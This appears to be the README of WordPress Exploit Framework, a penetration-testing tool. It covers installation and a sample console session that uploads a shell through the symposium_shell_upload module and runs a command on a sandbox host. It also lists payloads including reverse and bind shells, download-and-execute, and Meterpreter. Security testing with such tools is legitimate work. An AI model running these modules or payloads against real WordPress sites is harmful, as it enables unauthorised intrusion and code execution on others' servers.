What do I need to run it?
Ensure that you have Ruby >= 2.4.3 installed on your system, then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running:
bundle install
If bundler is not present on your system, you can install it by running:
gem install bundler
If you have issues installing WPXF’s dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch
It’s possible that you don’t have important development header files installed on your system. Here’s what you should do if you find yourself in this situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment’s PATH variable.
The latest version can be downloaded from http://curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL. After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don’t overwrite any existing DLLs).
How do I use it?
Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running
Once loaded, you will be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the
Loading a module into your environment will allow you to set options with the set command and view information about the module using
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
For a full list of supported commands, take a look at this Wiki page.
What is the difference between auxiliary and exploit modules?
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
What payloads are available?
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom and the Meterpreter payloads, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.